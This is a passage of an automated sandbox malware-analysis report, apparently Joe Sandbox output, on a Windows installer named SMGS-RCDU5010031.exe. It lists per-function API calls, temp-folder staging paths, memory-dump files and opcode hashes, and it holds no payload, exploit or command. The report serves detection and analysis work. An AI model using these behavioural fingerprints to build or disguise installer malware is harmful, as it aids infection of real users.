                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                                                                                                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                          • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                                                            • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes,?,00000000,000000F0), ref: 00401645
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes, xrefs: 00401638
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes
                                                                                                                                                                                                          • API String ID: 1892508949-2590807967
                                                                                                                                                                                                          • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                          • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405152
                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                                                                                                                            • Part of subcall function 00404160: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00404172
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                          • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                                                                          • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00638EC8), ref: 00401BA7
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BB9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                                          • Opcode ID: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
                                                                                                                                                                                                          • Instruction ID: 7a614025040163c027adcf1a42aafa75fa428ef26c0d2b57b4045ab01fe90682
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66219072A40100EBDB20EFA4CE85E5F77AAAF45324B25453BF106B32D1DA78A8518B5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 10001058 Relevance: 4.6, APIs: 3, Instructions: 55memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 100010AA
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 100010B9
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100010D6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFreeSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 465308736-0
                                                                                                                                                                                                          • Opcode ID: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
                                                                                                                                                                                                          • Instruction ID: f516a1bc6a14b8156c531ece61ee701a379590ab2ffb65a9b287619e966faa5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B012476800711A7F711EBB5AC859CB77ECEF882E07018026FA08C720AEFB0E9404B61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                          • Opcode ID: 92ab2df8331217a59a17599f40ffe36fb639f1bdbb8a7e9334f9d6b9ff154f8a
                                                                                                                                                                                                          • Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92ab2df8331217a59a17599f40ffe36fb639f1bdbb8a7e9334f9d6b9ff154f8a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1214770103-0
                                                                                                                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                          • Opcode ID: 72679c68904c0da51367ebbef88f38aa05796d10a352d8d827880ed32402d475
                                                                                                                                                                                                          • Instruction ID: 9e7747ffe68dd38d2e91679843896ff1bba49b3e2177530597f16d8d521728a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72679c68904c0da51367ebbef88f38aa05796d10a352d8d827880ed32402d475
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47119E31911205EBEB10CFA0CA489AEB7B4EF44354B20843FE046B72C0DAB89A41EB19
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                                                                          • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040642A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                            • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                                                            • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                                                            • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                          • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                                                                          • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405C25 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
